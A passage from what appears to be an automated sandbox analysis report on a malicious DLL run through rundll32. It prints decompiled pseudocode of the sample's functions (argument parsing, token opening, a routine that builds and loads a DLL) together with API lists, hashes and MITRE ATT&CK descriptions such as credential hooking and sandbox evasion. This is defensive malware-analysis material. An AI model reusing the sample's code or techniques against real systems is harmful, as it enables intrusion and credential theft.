				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0x1d0fd8a1
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0x1d0fd8a1
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x1488087d
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0x1d0fd8a1
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0x1d0fd8a1
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xff4d8a39
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x54e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x1488087d
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0x1d0fd8a1
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E041C6AB0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0x1d0fd8a1
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x40f8458b
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x54e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x54e85000
							E041C7C10(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E041C6970( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x54e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

0x041c4bf6
0x041c4bfb
0x041c4bff
0x041c4c02
0x041c4c02
0x041c4c05
0x041c4c0a
0x041c4c0f
0x041c4c12
0x041c4c17
0x041c4c1a
0x041c4c20
0x041c4c20
0x041c4c2b
0x041c4c2e
0x041c4c35
0x041c4c3a
0x00000000
0x00000000
0x041c4c40
0x041c4c45
0x041c4c45
0x041c4c4a
0x041c4c50
0x041c4c5a
0x041c4c5f
0x041c4c65
0x041c4c84
0x041c4c87
0x041c4c92
0x041c4c92
0x041c4c92
0x041c4c89
0x041c4c89
0x041c4c8b
0x00000000
0x041c4c8d
0x041c4c8d
0x041c4c8d
0x041c4c8b
0x041c4c9a
0x041c4c9f
0x041c4ca4
0x041c4caa
0x041c4cae
0x041c4cb1
0x041c4cb4
0x041c4cba
0x041c4cbf
0x041c4cc2
0x041c4cc8
0x041c4ccd
0x041c4cd3
0x041c4cd9
0x041c4cde
0x041c4ce1
0x041c4ce6
0x041c4cea
0x041c4cee
0x041c4cf1
0x041c4cf4
0x041c4cfd
0x041c4d04
0x041c4d07
0x041c4d0a
0x041c4d0f
0x041c4d14
0x041c4d17
0x041c4d1a
0x041c4d1a
0x041c4d1e
0x041c4d27
0x041c4d2e
0x041c4d31
0x041c4d36
0x041c4d3b
0x041c4d3b
0x041c4d3e
0x041c4d43
0x00000000
0x00000000
0x041c4c67
0x041c4c69
0x041c4c76
0x00000000
0x00000000
0x041c4c76
0x041c4c69
0x00000000
0x041c4c65
0x041c4d49
0x041c4d4e
0x041c4d51
0x041c4d54
0x041c4dff
0x041c4dff
0x041c4d5a
0x041c4d5a
0x041c4d5a
0x041c4d5f
0x041c4d89
0x041c4d8c
0x041c4d8c
0x041c4d91
0x041c4d93
0x041c4d95
0x041c4d98
0x041c4d9b
0x041c4da3
0x041c4da8
0x041c4da8
0x041c4dae
0x041c4db1
0x041c4db4
0x041c4db7
0x041c4db9
0x041c4db9
0x041c4dba
0x041c4dba
0x041c4db7
0x041c4dc8
0x041c4dcb
0x041c4dcf
0x041c4dd4
0x041c4dd7
0x041c4dda
0x041c4dda
0x041c4dda
0x041c4ddd
0x041c4ddd
0x041c4de0
0x041c4de0
0x041c4d61
0x041c4d61
0x041c4d71
0x041c4d74
0x041c4d79
0x041c4d79
0x041c4d7c
0x041c4d7f
0x041c4d82
0x041c4d84
0x041c4d84
0x041c4de3
0x041c4de5
0x041c4de8
0x041c4de8
0x041c4dee
0x041c4df2
0x041c4df5
0x041c4df7
0x041c4df7
0x041c4e08
0x041c4e0a
0x041c4e0a
0x041c4e12
0x041c4e20
0x041c4e23
0x041c4e25
0x041c4e45
0x041c4e45
0x041c4e48
0x041c4e4e
0x041c4e4f
0x041c4e52
0x041c4e54
0x041c4e57
0x041c4e5a
0x041c4e5d
0x041c4e61
0x041c4e64
0x041c4e67
0x041c4e6a
0x041c4e6c
0x041c4e6c
0x041c4e6f
0x041c4e71
0x041c4e71
0x041c4e74
0x041c4e76
0x041c4e79
0x041c4e81
0x041c4e84
0x041c4e89
0x041c4e89
0x041c4e8f
0x041c4e92
0x041c4e95
0x041c4e97
0x041c4e97
0x041c4e98
0x041c4e98
0x041c4ea3
0x041c4ea3
0x041c4ea3
0x041c4ea6
0x041c4ea9
0x041c4ea9
0x041c4eac
0x041c4eac
0x041c4e6f
0x041c4eaf
0x041c4eb2
0x041c4eb5
0x041c4eb7
0x041c4eba
0x041c4ebc
0x041c4ebf
0x041c4ec2
0x041c4ec4
0x041c4ec7
0x041c4ecf
0x041c4ed7
0x041c4eda
0x041c4eda
0x041c4eda
0x041c4edd
0x041c4edd
0x041c4edd
0x041c4ee0
0x041c4ee6
0x041c4ee8
0x041c4ee8
0x041c4eee
0x041c4ef4
0x041c4efd
0x041c4f04
0x041c4f06
0x041c4f09
0x041c4f09
0x041c4f0c
0x041c4f0c
0x041c4f0f
0x041c4f11
0x041c4f14
0x041c4f16
0x041c4f31
0x041c4f31
0x041c4f35
0x041c4f38
0x041c4f3b
0x041c4f3e
0x041c4f54
0x041c4f54
0x041c4f54
0x041c4f40
0x041c4f40
0x041c4f42
0x041c4f46
0x041c4f49
0x00000000
0x041c4f4b
0x041c4f4b
0x041c4f4d
0x00000000
0x041c4f4f
0x041c4f4f
0x041c4f4f
0x041c4f4d
0x041c4f49
0x041c4f58
0x041c4f5b
0x041c4f60
0x041c4f6a
0x041c4f6a
0x041c4f6a
0x041c4f6d
0x041c4f18
0x041c4f18
0x041c4f1a
0x041c4f21
0x041c4f21
0x041c4f23
0x041c4f25
0x041c4f27
0x041c4f2b
0x041c4f2d
0x041c4f2f
0x00000000
0x00000000
0x041c4f2f
0x041c4f2b
0x041c4f1c
0x041c4f1c
0x041c4f1f
0x00000000
0x00000000
0x041c4f1f
0x041c4f1a
0x041c4f77
0x041c4f79
0x041c4f79
0x041c4f84
0x041c4e27
0x041c4e27
0x041c4e2a
0x00000000
0x041c4e2c
0x041c4e2c
0x041c4e2e
0x041c4e32
0x00000000
0x041c4e34
0x041c4e34
0x041c4e34
0x041c4e37
0x00000000
0x041c4e3b
0x041c4e44
0x041c4e44
0x041c4e37
0x041c4e32
0x041c4e2a
0x041c4e16
0x041c4e1f
0x041c4e1f

APIs

memcpy.MSVCRT ref: 041C4CFD
memcpy.MSVCRT ref: 041C4D74
memcpy.MSVCRT ref: 041C4DA3
memcpy.MSVCRT ref: 041C4DCF
memcpy.MSVCRT ref: 041C4E84

Part of subcall function 041C7C10: memcpy.MSVCRT ref: 041C7CEE

Part of subcall function 041C6970: memcpy.MSVCRT ref: 041C699A

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
Instruction ID: 0365536306e122d2797d478d28db50ceb8a912c91f27106637c547db9184f577
Opcode Fuzzy Hash: 191502db103371a6f119a6cb88a99b4b76512d4ffc08430b1812c3d1ec3f331a
Instruction Fuzzy Hash: 65D13575604A009FDB24CF6DD9D0AAAB7E2FF98314B24896DE88ACB701D731F944CB54

Uniqueness

Uniqueness Score: -1.00%

Function 041BB947 Relevance: 6.1, APIs: 4, Instructions: 97
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E041BB947(intOrPtr __ecx) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				short* _v140;
				intOrPtr _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t52;
				signed int _t54;
				short* _t55;
				void* _t56;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t54 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t52 =  *(_t28 + _t41 * 4);
					_t30 =  *_t52 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t54 < 0x20) {
						 *(_t56 + _t54 * 4 - 0x8c) = _t52;
						_t40 = lstrlenW(_t52);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t54 = _t54 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t52[_t45] == 0x2c) {
								_t52[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t54 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t55 = _v140;
					L17:
					if( *_t55 == 0x5c ||  *((short*)(_t55 + 2)) == 0x3a) {
						E041BC145(_v16, _t55, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t55);
						_push("\\");
						_v12 = E041B9924( &_v664);
						E041BC145(_v16, _t36, 0x104);
						E041B913B( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t55 = _v144;
				goto L17;
			}

0x041bb950
0x041bb957
0x041bb95a
0x041bb967
0x041bb96d
0x041bb970
0x041bb972
0x041bb977
0x041bba4e
0x041bba4e
0x041bba4e
0x00000000
0x00000000
0x00000000
0x00000000
0x041bb97d
0x041bb97d
0x041bb97d
0x041bb980
0x041bb986
0x041bb9a2
0x041bb9a9
0x041bb9af
0x041bb9b3
0x041bb9c7
0x041bb9c7
0x041bb9ca
0x00000000
0x00000000
0x00000000
0x00000000
0x041bb9b5
0x041bb9b5
0x041bb9ba
0x041bb9be
0x041bb9be
0x041bb9c2
0x041bb9c3
0x00000000
0x041bb9b5
0x041bb9cb
0x041bb9cb
0x041bb9ce
0x041bb9cf
0x041bb9d6
0x041bb9e0
0x00000000
0x00000000
0x041bb9e2
0x041bb9e8
0x041bb9ec
0x041bba44
0x041bb9f5
0x041bba02
0x041bba08
0x041bba0a
0x041bba11
0x041bba22
0x041bba25
0x041bba30
0x041bba35
0x00000000
0x041bba4a
0x041bb9d8
0x00000000

APIs

GetCommandLineW.KERNEL32(00000000,00000228,00000228), ref: 041BB95C
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 041BB967
lstrlenW.KERNEL32(00000000), ref: 041BB9A9
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 041BBA02

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: CommandLine$ArgvCurrentDirectorylstrlen
String ID:
API String ID: 159791187-0
Opcode ID: 778219bf3666dabf8d0404cf861441e8eb14488ecc9722ffbd5b27de86b51f9e
Instruction ID: c42b22c9b7f79015e0cc968aa980d13ff5ed64d8ed3df730becdc9a50b334076
Opcode Fuzzy Hash: 778219bf3666dabf8d0404cf861441e8eb14488ecc9722ffbd5b27de86b51f9e
Instruction Fuzzy Hash: 7131D5B1D04119EBDB289FA9C8D4BEDB7B4EF45354F104099D485E3990EB74B981CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 041BDB58 Relevance: 6.0, APIs: 4, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E041BDB58(void* __ecx) {
				void* _v8;
				void* _t10;
				intOrPtr _t13;

				if(OpenThreadToken(GetCurrentThread(), 8, 0,  &_v8) != 0) {
					L4:
					_t10 = _v8;
				} else {
					if(GetLastError() != 0x3f0) {
						L3:
						_t10 = 0;
					} else {
						_t13 =  *0x41d0fa0; // 0x439f8a0
						if(OpenProcessToken( *((intOrPtr*)(_t13 + 0x130))(), 8,  &_v8) != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t10;
			}

0x041bdb77
0x041bdba9
0x041bdba9
0x041bdb79
0x041bdb84
0x041bdba5
0x041bdba5
0x041bdb86
0x041bdb90
0x041bdba3
0x00000000
0x00000000
0x00000000
0x00000000
0x041bdba3
0x041bdb84
0x041bdbae

APIs

GetCurrentThread.KERNEL32 ref: 041BDB6B
OpenThreadToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB72
GetLastError.KERNEL32(?,?,041BDC9D,00000000,041B0000), ref: 041BDB79
OpenProcessToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB9E

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: OpenThreadToken$CurrentErrorLastProcess
String ID:
API String ID: 1515895013-0
Opcode ID: 48ce55b3d50b36d644e475aa8e1670126f80f99e6083846f46a2a22da9eccede
Instruction ID: dc1e0f5d31234d3cbb17f878997a56dc98a48c3f53e44f1a32101440436e7101
Opcode Fuzzy Hash: 48ce55b3d50b36d644e475aa8e1670126f80f99e6083846f46a2a22da9eccede
Instruction Fuzzy Hash: BDF09071601109AFDB44ABA5ED89F9A3BECFB08345F140450E242D3040DB24BE408B55

Uniqueness

Uniqueness Score: -1.00%

Function 041BA222 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E041BA222(void* __ecx, void* __edx) {
				WCHAR* _v8;
				char _v12;
				char _v140;
				WCHAR* _t12;
				intOrPtr _t17;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t43;
				void* _t54;
				WCHAR* _t55;
				char* _t56;
				WCHAR* _t57;
				intOrPtr _t58;
				char _t60;
				struct HINSTANCE__* _t61;

				_t43 = 0;
				_t12 = E041B90EA(__ecx, 0x152a);
				_t58 =  *0x41d0fd8; // 0x439fc50
				_t55 = _t12;
				_t59 = _t58 + 0xb0;
				_v8 = _t55;
				E041BC08E( &_v140, 0x40, L"%08x", E041BE605(_t59, E041BCE25(_t58 + 0xb0), 0));
				_t17 =  *0x41d0fd8; // 0x439fc50
				_t3 = _t17 + 0xa8; // 0x1
				asm("sbb eax, eax");
				_t22 = E041B90EA(_t59, ( ~( *_t3) & 0x000010d8) + 0x2f7);
				_t56 = "\\";
				_t23 =  *0x41d0fd8; // 0x439fc50
				_t60 = E041B9924(_t23 + 0x1020);
				_v12 = _t60;
				E041B9D66( &_v8);
				_t29 =  *0x41d0fd8; // 0x439fc50
				_t57 = E041B9924(_t29 + 0x122a);
				_t32 =  *0x41d0fa0; // 0x439f8a0
				_v8 = _t57;
				 *((intOrPtr*)(_t32 + 0x120))(_t60, _t57, 0, _t56,  &_v140, ".", L"dll", 0, _t56, _t22, _t56, _t55, 0);
				_t61 = LoadLibraryW(_t57);
				if(_t61 != 0) {
					_push(_t61);
					_t54 = 0x3c;
					_t43 = E041B9446(0x41cd9bc, _t54);
				}
				E041B913B( &_v12, 0xfffffffe);
				E041B92A2( &_v140, 0, 0x80);
				if(_t43 != 0) {
					 *0x41d10ac = _t61;
					 *0x41d10b4 = _t57;
				} else {
					E041B913B( &_v8, 0xfffffffe);
				}
				return _t43;
			}

0x041ba233
0x041ba235
0x041ba23a
0x041ba240
0x041ba243
0x041ba249
0x041ba26c
0x041ba271
0x041ba276
0x041ba27e
0x041ba28b
0x041ba292
0x041ba299
0x041ba2aa
0x041ba2b0
0x041ba2b3
0x041ba2ca
0x041ba2de
0x041ba2e0
0x041ba2e5
0x041ba2eb
0x041ba2f8
0x041ba2fc
0x041ba2fe
0x041ba301
0x041ba30d
0x041ba30d
0x041ba315
0x041ba328
0x041ba332
0x041ba343
0x041ba349
0x041ba334
0x041ba33a
0x041ba340
0x041ba355

APIs

Part of subcall function 041BC08E: _vsnwprintf.MSVCRT ref: 041BC0AB

Part of subcall function 041B9924: lstrcatW.KERNEL32(00000000,?), ref: 041B9963

LoadLibraryW.KERNEL32(00000000), ref: 041BA2F2

Strings

%08x, xrefs: 041BA25E
dll, xrefs: 041BA2B9

Memory Dump Source

Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd

Similarity

API ID: LibraryLoad_vsnwprintflstrcat
String ID: %08x$dll
API String ID: 1445519121-2963171978
Opcode ID: 05de103cda07c27ef5742f3470262c0c7323fa11bf5d3442a1da56041be9540d
Instruction ID: 8bc30f27ed0648590cb1e815f7884f74c1f8bfa204532a0459412a4b22064ba1
Opcode Fuzzy Hash: 05de103cda07c27ef5742f3470262c0c7323fa11bf5d3442a1da56041be9540d
Instruction Fuzzy Hash: FB31B5F2A01214BBE710A669DDC5FDF37ACDB88758F144169F244E7280EB78AD4587A0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

